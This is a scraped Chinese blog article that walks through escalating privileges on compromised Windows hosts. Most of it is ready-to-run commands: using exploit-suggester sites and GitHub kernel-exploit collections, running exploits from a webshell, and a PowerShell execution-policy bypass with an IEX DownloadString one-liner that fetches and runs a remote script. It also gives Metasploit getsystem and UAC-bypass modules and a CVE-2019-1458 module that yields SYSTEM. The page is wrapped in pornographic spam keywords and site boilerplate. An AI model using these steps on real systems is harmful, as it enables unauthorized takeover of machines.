国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Windows提權(quán)流程及手法

這篇具有很好參考價值的文章主要介紹了Windows提權(quán)流程及手法。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

一、信息收集

收集本機systeminfo中補丁信息

在提權(quán)輔助平臺 https://i.hacking8.com/tiquan/ 中查詢可利用exp

提權(quán)腳本,Penetration Testing,權(quán)限提升

查詢exp,選擇對應(yīng)的Exp下載運行

https://i.hacking8.com/
https://github.com/SecWiki/windows-kernel-exploits

提權(quán)Exp的運行方式,一般有以下幾種:

1、直接執(zhí)行exe程序,成功后會打開一個cmd窗口,在新窗口中權(quán)限就是system
2、在WebShell中執(zhí)行exe程序,執(zhí)行方式為xxx.exe whoami,成功后直接執(zhí)行命令,再修改命令內(nèi)容,可以執(zhí)行不同的命令
3、利用MSF等工具
4、C++源碼,Python腳本,PowerShell腳本等特殊方式

二、WinSystemHelper

使用WinSystemHelper檢查可利用的漏洞。該工具適合在任何Windows服務(wù)器上進行已知提權(quán)漏洞的檢測

https://github.com/brianwrf/WinSystemHelper
圖片

上傳WinSysHelper.bat、explt2003.txt、expgt2003.txt,運行bat查看結(jié)果

然后在可利用的Exp中任意下載一個并執(zhí)行即可

三、Sherlock

Sherlock是在Windows下用于本地提權(quán)的PowerShell腳本
分析漏洞出漏洞后利用對應(yīng)Exp即可

https://github.com/rasta-mouse/Sherlock
圖片

啟動Powershell
$ powershell.exe -exec bypass

本地加載腳本
$ Import-Module Sherlock.ps1

遠程加載腳本
$ IEX (New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1’)

檢查漏洞,Vulnstatus為Appears Vulnerable即存在漏洞
$ Find-AllVulns

四、MSF提權(quán)

Getsystem
meterpreter> getsystem

BypassUAC

use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use windows/local/bypassuac_vbs
use windows/local/ask
meterpreter> background  # 后臺session 
msf> use exploit/windows/local/bypassuac
msf> set SESSION <session_id>  

后臺session時會返回session_id,如不清楚可以使用命令sessions -l
msf> run

內(nèi)核提權(quán)
查詢補丁

meterpreter> run post/windows/gather/enum_patches 
[+] KB2999226 installed on 11/25/2020
[+] KB976902 installed on 11/21/2010

查詢Exp

msf> use post/multi/recon/local_exploit_suggester 
msf> set LHOST <攻擊機IP>
msf> set SESSION <session_id>
msf> run

利用示例文章來源地址http://www.zghlxwxcb.cn/news/detail-717695.html

msf> use exploit/windows/local/cve_2019_1458_wizardopium 
msf> set SESSION <session_id>
msf> run
meterpreter> getuid
Server username: NT AUTHORITY\SYSTEM

五、參考鏈接

https://github.com/SecWiki/windows-kernel-exploits

https://github.com/brianwrf/WinSystemHelper

https://github.com/rasta-mouse/Sherlock

到了這里,關(guān)于Windows提權(quán)流程及手法的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • 權(quán)限提升-Windows本地提權(quán)-AT+SC+PS命令-進程遷移-令牌竊取-getsystem+UAC

    權(quán)限提升-Windows本地提權(quán)-AT+SC+PS命令-進程遷移-令牌竊取-getsystem+UAC

    1、具體有哪些權(quán)限需要我們了解掌握的? 后臺權(quán)限,網(wǎng)站權(quán)限,數(shù)據(jù)庫權(quán)限,接口權(quán)限,系統(tǒng)權(quán)限,域控權(quán)限等 2、以上常見權(quán)限獲取方法簡要歸類說明? 后臺權(quán)限:SQL注入 , 數(shù)據(jù)庫備份泄露,默認或弱口令等獲取帳號密碼進入 網(wǎng)站權(quán)限:后臺提升至網(wǎng)站權(quán)限,RCE或文件操

    2024年02月10日
    瀏覽(23)
  • windows腳本獲取管理員權(quán)限修改host

    很多時候我們常常需要通過管理員權(quán)限執(zhí)行腳本,腳本可能涉及到一些受保護信息的訪問,我們寫個簡單的腳本來更改host文件,host文件就是需要管理員權(quán)限才能訪問的啟動腳本時先檢查是否有管理員權(quán)限,如果沒有就調(diào)用授權(quán)腳本進行管理員授權(quán)打開,給用戶彈出需要管理

    2024年02月14日
    瀏覽(23)
  • Windows 開機啟動腳本 (不詢問自動以管理員權(quán)限運行bat)

    獲取開機啟動文件夾 之后將“你的.bat”文件放入“開機啟動文件夾”內(nèi)即可 快捷鍵Win+R,zhixing shell:startup 打開用戶級的開機自啟文件夾 或者cmd執(zhí)行: 之后將“你的.bat”文件放入“開機啟動文件夾”內(nèi)即可 相關(guān)參考: Windows設(shè)置程序開機自啟動的幾種方法(整理發(fā)布) 使用

    2024年02月13日
    瀏覽(21)
  • 操作系統(tǒng)權(quán)限提升(十八)之Linux提權(quán)-內(nèi)核提權(quán)

    操作系統(tǒng)權(quán)限提升(十八)之Linux提權(quán)-內(nèi)核提權(quán)

    內(nèi)核提權(quán)是利用Linux內(nèi)核的漏洞進行提權(quán)的,內(nèi)核漏洞進行提權(quán)一般包括三個環(huán)節(jié): 1、對目標(biāo)系統(tǒng)進行信息收集,獲取到系統(tǒng)內(nèi)核信息及版本信息; 2、根據(jù)內(nèi)核版本獲取其對應(yīng)的漏洞以及EXP 3、使用找到的EXP對目標(biāo)系統(tǒng)發(fā)起攻擊,完成提權(quán)操作 查看Linux操作系統(tǒng)的內(nèi)核版本

    2024年01月16日
    瀏覽(26)
  • 操作系統(tǒng)權(quán)限提升(十九)之Linux提權(quán)-SUID提權(quán)

    操作系統(tǒng)權(quán)限提升(十九)之Linux提權(quán)-SUID提權(quán)

    系列文章 操作系統(tǒng)權(quán)限提升(十八)之Linux提權(quán)-內(nèi)核提權(quán) SUID是一種特殊權(quán)限,設(shè)置了suid的程序文件,在用戶執(zhí)行該程序時,用戶的權(quán)限是該程序文件屬主的權(quán)限,例如程序文件的屬主是root,那么執(zhí)行該程序的用戶就將暫時獲得root賬戶的權(quán)限。sgid與suid類似,只是執(zhí)行程序時獲

    2024年02月14日
    瀏覽(16)
  • 權(quán)限提升:網(wǎng)站漏洞(提權(quán)思路.)

    權(quán)限提升:網(wǎng)站漏洞(提權(quán)思路.)

    權(quán)限提升簡稱 提權(quán) ,由于 操作系統(tǒng)都是多用戶操作系統(tǒng) , 用戶之間都有權(quán)限控制 ,比如通過 Web 漏洞拿到的是 Web 進程的權(quán)限,往往 Web 服務(wù)都是以一個權(quán)限很低的賬號啟動的,因此通過 Webshell 進行一些操作會受到限制,這就需要將其提升為管理甚至是 System 權(quán)限。通常通

    2024年02月05日
    瀏覽(20)
  • 權(quán)限提升:網(wǎng)站后臺.(提權(quán)思路.)

    權(quán)限提升:網(wǎng)站后臺.(提權(quán)思路.)

    權(quán)限提升簡稱 提權(quán) ,由于 操作系統(tǒng)都是多用戶操作系統(tǒng) , 用戶之間都有權(quán)限控制 ,比如通過 Web 漏洞拿到的是 Web 進程的權(quán)限,往往 Web 服務(wù)都是以一個權(quán)限很低的賬號啟動的,因此通過 Webshell 進行一些操作會受到限制,這就需要將其提升為管理甚至是 System 權(quán)限。通常通

    2024年02月01日
    瀏覽(26)
  • 操作系統(tǒng)權(quán)限提升(十四)之繞過UAC提權(quán)-基于白名單AutoElevate繞過UAC提權(quán)

    系列文章 操作系統(tǒng)權(quán)限提升(十二)之繞過UAC提權(quán)-Windows UAC概述 操作系統(tǒng)權(quán)限提升(十三)之繞過UAC提權(quán)-MSF和CS繞過UAC提權(quán) 注:閱讀本編文章前,請先閱讀系列文章,以免造成看不懂的情況??! 利用白名單程序的本質(zhì)實際上是劫持注冊表,這種方法主要是通過尋找autoElevated屬性為

    2024年02月16日
    瀏覽(25)
  • 操作系統(tǒng)權(quán)限提升(十三)之繞過UAC提權(quán)-MSF和CS繞過UAC提權(quán)

    操作系統(tǒng)權(quán)限提升(十三)之繞過UAC提權(quán)-MSF和CS繞過UAC提權(quán)

    系列文章 操作系統(tǒng)權(quán)限提升(十二)之繞過UAC提權(quán)-Windows UAC概述 注:閱讀本編文章前,請先閱讀系列文章,以免造成看不懂的情況!! 拿到一個普通管理員的SHELL,在CS中沒有*號代表有UAC 執(zhí)行添加用戶的命令時顯示拒絕訪問 使用CS自帶的插件進行繞過提權(quán) 直接提到了system權(quán)限

    2024年02月16日
    瀏覽(20)
  • Linux中特殊權(quán)限和提權(quán)詳解

    sgid : ?針對二進制的可執(zhí)行文件,如果該文件有sgid的權(quán)限,那么當(dāng)其他任何人來執(zhí)行該文件時,則臨時擁有文件擁有組的權(quán)限 針對目錄: 如果一個目錄有sgid權(quán)限,則在該目錄下創(chuàng)建的的子目錄可以繼承該目錄的權(quán)限,但是還是得根據(jù)umask值來繼承,其他用戶在該目錄下創(chuàng)建子目錄

    2024年01月25日
    瀏覽(16)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包